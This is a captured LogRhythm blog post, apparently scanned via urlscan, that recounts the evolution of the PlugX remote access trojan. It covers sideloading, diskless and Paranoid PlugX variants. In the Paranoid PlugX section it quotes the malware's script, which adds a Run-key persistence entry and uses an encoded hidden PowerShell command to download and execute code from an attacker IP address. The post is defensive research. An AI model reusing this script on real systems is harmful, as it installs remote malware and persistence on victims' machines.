logrhythm.com
Open in
urlscan Pro
141.193.213.20
Public Scan
URL:
https://logrhythm.com/blog/deep-dive-into-plugx-malware/
Submission: On January 26 via api from US — Scanned from DE
Submission: On January 26 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
<form class="mktoForm mktoHasWidth mktoLayoutLeft" data-formid="1920" id="" novalidate="novalidate" style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 800px;">
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton {
color: #fff;
border: 1px solid #75ae4c;
padding: 0.4em 1em;
font-size: 1em;
background-color: #99c47c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#99c47c), to(#75ae4c));
background-image: -webkit-linear-gradient(top, #99c47c, #75ae4c);
background-image: -moz-linear-gradient(top, #99c47c, #75ae4c);
background-image: linear-gradient(to bottom, #99c47c, #75ae4c);
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:hover {
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:focus {
outline: none;
border: 1px solid #447f19;
}
.mktoForm .mktoButtonWrap.mktoSimple .mktoButton:active {
background-color: #75ae4c;
background-image: -webkit-gradient(linear, left top, left bottom, from(#75ae4c), to(#99c47c));
background-image: -webkit-linear-gradient(top, #75ae4c, #99c47c);
background-image: -moz-linear-gradient(top, #75ae4c, #99c47c);
background-image: linear-gradient(to bottom, #75ae4c, #99c47c);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="FirstName" id="LblFirstName" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>First:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="FirstName" name="FirstName" placeholder="First Name" maxlength="255" aria-labelledby="LblFirstName InstructFirstName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructFirstName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="LastName" id="LblLastName" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Last:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="LastName" name="LastName" placeholder="Last Name" maxlength="255" aria-labelledby="LblLastName InstructLastName" type="text"
class="mktoField mktoTextField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructLastName" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 100px;">
<div class="mktoAsterix">*</div>Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email" name="Email" placeholder="Email" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 150px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_campaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_medium" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_source" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_term" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AdGroup" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="asset_url" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="LandingPageURL" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="TY_Page_URL__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="https://logrhythm.com/blog-newsletter-subscription-ty/" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_language__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_region__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="NULL" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_social__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="FALSE" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoSimple" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe Now</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="1920"><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="050-UWT-888">
</form><form class="mktoForm mktoHasWidth mktoLayoutLeft" data-formid="1920" novalidate="novalidate"
style="font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form>Text Content
See What's New @LogRhythm Explore Quarterly Progress
1-866-384-0713
Customer Portal
Toggle navigation
* Products
* LogRhythm Axon
Cloud-Native SaaS SIEM Platform
Powerful security analytics, an intuitive analyst workflow, and simplified
incident response enables seamless threat detection, investigation, and
response. Built to easily scale and manage, LogRhythm Axon provides
automated and centralized visibility into SaaS, self-hosted cloud, and
on-prem environments, helping security teams focus on the work that
matters.
* LogRhythm SIEM
Self-Hosted SIEM Platform
Detect and remediate security incidents quickly and for a lower cost of
ownership. With intuitive, high-performance analytics, enhanced
collection, and a seamless incident response workflow, LogRhythm SIEM
helps your organization uncover threats, mitigate attacks, and comply with
necessary mandates.
* LogRhythm NDR
Network Detection & Response
Gain 360-degree visibility to better protect your network. LogRhythm NDR
monitors and analyzes vast amounts of network traffic with both
deterministic rules and machine learning to surface the most pertinent
threats that attack outside the perimeter.
* LogRhythm UEBA
User & Entity Behavior Analytics
Extend your SIEM detection capabilities by using advanced analytics to
monitor your users with LogRhythm UEBA. This add-on offers extra layers of
security monitoring and machine learning to detect user-based anomalies
and helps analysts prioritize the findings for investigation and response.
* Solutions
* SIEM
Detect, investigate, and neutralize threats with our end-to-end platform.
* SOAR
Work smarter, more efficiently, and more effectively.
* UEBA
Detect anomalous user behavior and threats with advanced analytics.
* Log Management
Gain full visibility into your data and the threats that hide there.
* Threat Detection
Build a strong foundation of people, process, and technology to accelerate
threat detection and response.
* Compliance
Meet and report on compliance mandates, including PCI, HIPAA, NERC, CIP,
and more.
* Incident Management
Combine rich insights and systematic workflows to respond to threats more
effectively.
* Zero Trust Security Model
How to protect your people, devices, and data across the enterprise.
* MITRE ATT&CK Framework
How do your strategic security defenses stand up to the MITRE ATT&CK
framework?
* Security Solutions Overview
* Industries
* Utilities
Safeguarding systems and devices in critical utility infrastructure.
* Government
Meet the challenges of defending public sector data.
* Financial Services
Safeguarding data and minimizing risk in financial services.
* Manufacturing
Defend your operational technology environment with SIEM.
* Healthcare
Protecting sensitive patient healthcare data.
* Legal
Protect your law firm’s network and data.
* Work With Us
* Partners
* Technology Partners
* Services Authorized Partners
* Partner Portal
* Customers
* Welcome to LogRhythm
* Customer Testimonials
* Services
* Training
* Customer Support
* Is your security team stressed?
* If you work in security, hearing that stress is impacting your space is
likely no surprise. Learn why your team may be experiencing more stress
than ever before in this new research.
*
* Download the Research
* Request Demo
* LogRhythm Community
* Resources
* Resource Library
* Analyst Reports
* Product Demos
* White Papers & e-Books
* Case Studies
* Use Cases
* Threat Research
* Security Spotlight
* Webcasts
*
* All Resources
*
* Blog
Read the latest security news and insights from security professionals and
our award-winning LogRhythm Labs team.
* Events
Connect with LogRhythm security experts at trade shows, conferences, and
events across the globe.
* LogRhythm Labs
Learn how our team of security experts can help you succeed through their
real-world SOC experience.
*
*
* Featured Content
* About
* About Us
* Executive Team
* What's New @ LogRhythm
* Awards & Recognition
* Customer Testimonials
* In the News
* Press Releases
* Logiving
* Careers
*
* Contact Us
* See why organizations choose us
* Customers and peers agree. Working with LogRhythm is a recipe for success.
Don’t just take it from us. Read reviews from our customers on Gartner
Peer Insights.
*
* See what’s new with LogRhythm
* Our customers inspire us to push innovative boundaries every single day.
Learn about our latest product developments to help you be ready to
defend!
*
* Get the Scoop
* Request Info
TAKE A DEEP DIVE INTO PLUGX MALWARE
Posted on April 18, 2018 | Featured | No Comments
Category: LogRhythm Labs | Security Tips and Tricks
Type: Blog
In June 2017, Palo Alto’s Unit 42 Threat Research team published an excellent
blog post on a newly detected version of the PlugX malware family, also known as
“Korplug.” Interested to find out more about this new variant, I started digging
around and found that there have been many new samples of “PlugX v1.” This isn’t
too surprising considering that a builder for version one of the malware has
been publicly available for several years. However, this piqued my curiosity. I
decided to look into where these old samples were used and whether there was any
specific targeting. In terms of malware detection, it is always interesting to
see old code repurposed or reused in new attacks and campaigns, as seen in the
resurgence of Shamoon Malware in 2016.
A HISTORY OF PLUGX MALWARE
The PlugX malware family is well known to researchers, with samples dating back
to as early as 2008, according to researchers at Trend Micro. PlugX is a fully
featured Remote Access Tool/Trojan (RAT) with capabilities such as file upload,
download, and modification, keystroke logging, webcam control, and access to a
remote cmd.exe shell.
Until recently, distinct versions of PlugX malware maintained consistent
methodologies for encryption, configuration, and persistence — despite evolution
of the tool’s development over the years. In 2014, there was a resurgence of
this malware family, making it the most utilized family of that year, according
to Crowdstrike’s Global Threat Report released in February 2015. Changes to the
command and control (C2) options contributed to this resurgence because the
malware authors implemented new DNS C2 methodology that made traffic harder to
detect.
Until the end of 2016, the typical PlugX infection methodology was the same: The
malware payload was typically delivered via a phishing campaign, either as an
attached self-extracting RAR (SFX) archive, link to an archive, or embedded in a
weaponized document. This archive contains three files that make up the PlugX
components. An example of these three components is as follows (extracted from
the RAR archive with SHA-256 hash
1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0):
Figure 1: PlugX Component Files
Although the above sample used an NVIDIA application, many PlugX samples of this
variant leveraged applications associated with antivirus or various other
security products. Because these executables are signed, legitimate
applications, endpoint security products are less likely to flag them.
Furthermore, usage of antivirus-related applications can potentially take
advantage of product whitelisting on the endpoint.
There have been many extensive analyses of the aforementioned PlugX variants
over the years, as is evident by the lengthy — and yet still incomplete —
references in the Appendix of this post, so I will not repeat a full analysis
here. However, a brief overview of the “original” or “classic” PlugX execution
method is available below.
Figure 2: PlugX SFX Archive Components
CLASSIC PLUGX EXECUTION METHODOLOGY
Below is a depiction of the execution methodology for the classic variant of
PlugX — most variants roughly follow this pattern, but there are some
deviations. Execution flow in general proceeds as follows:
1. The three PlugX components are extracted from the archive to a temporary
directory on the system.
2. The legitimate, signed program is executed and the malicious loader DLL is
sideloaded.
3. The loader DLL decrypts and decompresses the payload file.
4. The decrypted shellcode is injected into a legitimate system process.
* Note: This step is performed in different ways (code injection, process
hollowing) depending on the specific variant of PlugX, but the basic
methodology is the same.
5. Injected Windows process conducts C2/PlugX functionality.
Figure 3: PlugX Execution Chain
CORE PLUGX MALWARE FUNCTIONALITY EVOLVES
In 2013, multiple updates to the core PlugX malware functionality occurred,
including the addition of new C2 protocols, encryption, and installation
methodologies. Researchers with Airbus analyzed several samples that appeared to
be from mid-to-late 2013. These samples represented an intermediate version of
PlugX, with characteristics falling between the original “v1” and “v2” variants.
The main updates in this variant included a new, custom encryption algorithm
used for configuration data, network communications, and strings within the
binaries. Also featured in this variant was the addition of the ICMP protocol as
a new C2 methodology and a modification of the HTTP packet format. Later
versions of this variant added DNS C2 as a module.
In 2013, researchers at Lastline also detected variants that included an update
to the PlugX malware deployment and installation methodologies. Although the
dropped files and chain of execution matched that of the classic PlugX variants
(three components: legitimate executable, loader DLL, and encrypted payload),
these samples featured User Account Control (UAC) evasion functionality and an
alternative process creation mechanism using Component Object Model (COM)
objects.
Researchers at Sophos first discovered a new strain of memory-resident PlugX at
the end of 2013. The malware was discovered in a campaign exploiting a
vulnerability in the popular Japanese word processing software, Ichitaro. Unlike
the classic PlugX samples that drop the three components previously discussed,
the “diskless” samples do not use the sideloading technique with a valid
executable — the loader DLL and payload are not written as files to disk. The
memory-resident PlugX, upon successful exploitation of the delivery method
(typically a weaponized Rich Tech Format (RTF) document), executes shellcode
that decrypts and decompresses the payload, which is a masked DLL file that is
then loaded in memory and executed.
While 2014 showed a great uptick in the use of PlugX in Advanced Persistent
Threat (APT) campaigns, the variants observed mostly consisted of v1/v2
“classic” samples. In 2015, however, researchers observed a few variants that
deviated from the classic execution methodology and added a new communication
methodology to the PlugX repertoire. In the beginning of 2015, researchers from
JPCERT reported on a variant of PlugX that added peer-to-peer (P2P)
functionality, allowing the malware to communicate with other infected hosts on
the local network.
Fast forward to March 2015: Carbon Black detected an additional PlugX variant
that used a different loading methodology compared to earlier samples. In this
variant, only the loader DLL and encrypted payload are dropped to the system;
the malware uses the legitimate Windows system file rundll32.exe to execute the
malicious PlugX DLL from an export rather than relying on sideloading.
In August 2015, researchers at Airbus discovered a new variant of the “original”
PlugX. This variant utilized a fourth file in the initial installation of the
RAT. This file, also embedded in the SFX RAR, is a small executable file that
provides an additional execution method of the main binary. The executable
creates the registry value
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\18\ShellExecute
with the data pointing to the PlugX installation binary. This registry key maps
special keyboard keys to commands or programs, such as music or mail, that
execute when someone presses that key. Key number 18 typically corresponds to
the “calculator” key. Once this registry key is set, the malware
programmatically triggers a “press” of the key, thereby executing the
installation binary. This method effectively provides an alternative execution
of the malware chain.
Similar to the 2008 campaign, PlugX is often used with another common RAT called
Poison Ivy. In 2017, researchers from JPCERT discovered a variant of PlugX that
actually had code overlap with Poison Ivy in the form of a hash algorithm. This
code was used to obscure the Windows API calls in the binary. The format of the
final decrypted payload of the new samples departed from the methodology of
previous PlugX variants, instead the format mimicked that of Poison Ivy.
In June 2017, researchers at Palo Alto Networks released a review of a new PlugX
variant they detected on their networks, which they named “Paranoid PlugX.” This
variant added several new mechanisms for avoiding security controls and
detection, including new methods for determining the C2 server address after
execution, new loading methodology, and new methods for avoiding detection on
disk. Rather than dropping the executable, loader DLL, and payload to disk, this
variant used a Visual Basic (VB) script to perform two attempts to download and
execute the code.
a=new ActiveXObject(WScript.Shell);
a.run('%windir%\\System32\\reg.exe add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v MSASCuiL2 /t reg_sz /d %windir%\\System32\\msiexec.exe /q /i hxxp://172.104.65\.97/Tasks.png /f', 0);window.close();
a.run('%windir%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle hidden -ep bypass -enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEANwAyAC4AMQAwADQALgA2ADUALgA5ADcALwBnAHUAZQBzAHQALgBwAHMAMQAnACkAOwAKAA==', 0);window.close();
</script>
Figure 3: Paranoid PlugX Download and Execution Script
The above code creates persistence in the “Run” registry key for the execution
of a file downloaded from the URL in the command. The code highlighted in blue
uses PowerShell to download another PowerShell file named “guest.psl” from the
same IP address as the first command. In both cases, the embedded PlugX
shellcode that is executed are identical. Another feature that makes Paranoid
PlugX deviate from previous variants is that the embedded payload is wrapped in
a .NET Framework file, which has not been seen in other samples.
TIMELINE OF PLUGX VARIANTS
The following is a rough timeline that illustrates when samples of the variants
discussed were initially reported publicly. Note: The dates below correspond to
detection/reporting of samples displaying the stated functionality — the actual
samples referenced may have compilation or creation dates earlier than those
listed below.
Figure 4: PlugX History Timeline
PLUGX REMAINS A THREAT
Although there have been several variants over the years, an analysis of the
timeline of variants discussed demonstrates the “original” PlugX variant
continues to be used today. Despite the evolution of PlugX methodologies and
techniques, these classic PlugX samples remain successful and are still utilized
in adversarial campaigns as a result.
In conducting this research, I found a wealth of information from different
research groups published over the last eight years. While this is by no means
inclusive of all PlugX research conducted, the resources cover many of the
highlights of the malware’s evolution over the years.
Click here to view the sources of PlugX variants mentioned above.
--------------------------------------------------------------------------------
SUBSCRIBE TO OUR BLOG NEWSLETTER
*
First:
*
Last:
*
Email:
Subscribe Now
Share on LinkedIn Share on X (Twitter) Share on Facebook Share on Reddit Share
on Email
PRODUCTS
* LogRhythm SIEM
* LogRhythm NDR
* LogRhythm UEBA
* LogRhythm Axon
SOLUTIONS
* SIEM
* SOAR
* UEBA
* Log Management
* Threat Detection
* Compliance
* MITRE ATT&CK
* Zero Trust
RESOURCES
* ROI Calculator
* Pricing & Licensing
* Product Demos
* White Papers & e-Books
* Product Data Sheets
* Testimonials
* Analyst Reports
* Case Studies
* Use Cases
* Threat Research
* Infographics
* Brochures
* Webcasts
SUPPORT
* Getting Started
* SIEM-Supporting Services
* LogRhythm Axon Services
* Customer Success
* Global Support Services
* LogRhythm Labs
* Training
* Knowledge Base
* Documentation
* Product Security
INDUSTRIES
* Healthcare
* Government
* Utilities
* Financial Services
* Manufacturing
* Legal
PARTNERS
* Partner Portal
* Services Authorized Partners
* Technology Partners
* Joint Solution Briefs
COMPANY
* What's New
* Leadership
* Press Releases
* In the News
* Careers
CONNECT WITH US
* LogRhythm Blog
* Customer Portal
* Contact
* Events
AWARDS & RECOGNITION
COMMUNITY
SUPPORT
+1-866-255-0862
SALES
+1-866-384-0713 info@logrhythm.com
--------------------------------------------------------------------------------
© LogRhythm, Inc. All Rights Reserved. Privacy Statement | Terms & Conditions |
Cookie Notice | Cookie-Präferenzen